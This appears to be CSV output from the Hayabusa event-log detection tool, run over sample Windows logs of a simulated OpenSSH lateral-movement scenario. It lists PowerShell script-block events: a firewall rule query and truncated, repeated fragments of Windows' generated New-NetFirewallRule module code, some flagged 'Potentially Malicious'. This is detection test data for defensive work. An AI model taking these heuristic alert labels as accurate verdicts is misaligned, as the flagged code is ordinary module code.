Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:36.183 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule -Name *ssh*,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; 